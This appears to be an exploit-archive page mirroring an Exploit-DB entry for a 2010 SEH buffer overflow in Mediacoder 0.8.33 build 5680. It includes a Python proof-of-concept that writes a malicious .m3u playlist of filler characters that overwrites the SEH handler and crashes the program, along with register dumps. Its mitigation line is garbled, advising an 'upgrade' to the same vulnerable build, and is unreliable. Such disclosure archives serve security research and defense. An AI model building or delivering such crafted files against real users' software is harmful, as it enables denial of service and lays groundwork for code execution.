header-logo
Suggest Exploit
vendor:
Mediacoder
by:
Hadji Samir
9,3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Mediacoder
Affected Version From: 0.8.33 build 5680
Affected Version To: 0.8.33 build 5680
Patch Exists: Yes
Related CWE: N/A
CPE: a:mediacoderhq:mediacoder
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2010

Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.m3u)

Mediacoder 0.8.33 build 5680 is vulnerable to a SEH buffer overflow exploit. The vulnerability is triggered when a specially crafted .m3u file is opened. The file contains a malicious URL with 845 A characters followed by 4 B characters, 4 C characters, and 60 D characters. When the file is opened, the SEH handler is overwritten and the application crashes.

Mitigation:

Upgrade to the latest version of Mediacoder 0.8.33 build 5680.
Source

Exploit-DB raw data:

# Exploit Title: Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.m3u)
# Date: 11/29/2010
# Author: Hadji Samir s-dz@hotmail.fr
# Software Link: http://dl.mediacoderhq.com/files001/MediaCoder-0.8.33.5680.exe
# Version: 0.8.33 build 5680

#    EAX 0012E508
#    ECX 43434343
#    EDX 00000000
#    EBX 43434343
#    ESP 0012E4A4
#    EBP 0012E4F4
#    ESI 0012E508
#    EDI 00000000

#!/usr/bin/python
buffer = ("http://" + "A" * 845)
nseh = ("B" * 4)
seh  = ("C" * 4)
junk = ("D" * 60)

f= open("exploit.m3u",'w')
f.write(buffer + nseh + seh + junk)
f.close()

Navigation

Suggest Exploit

Services By CQR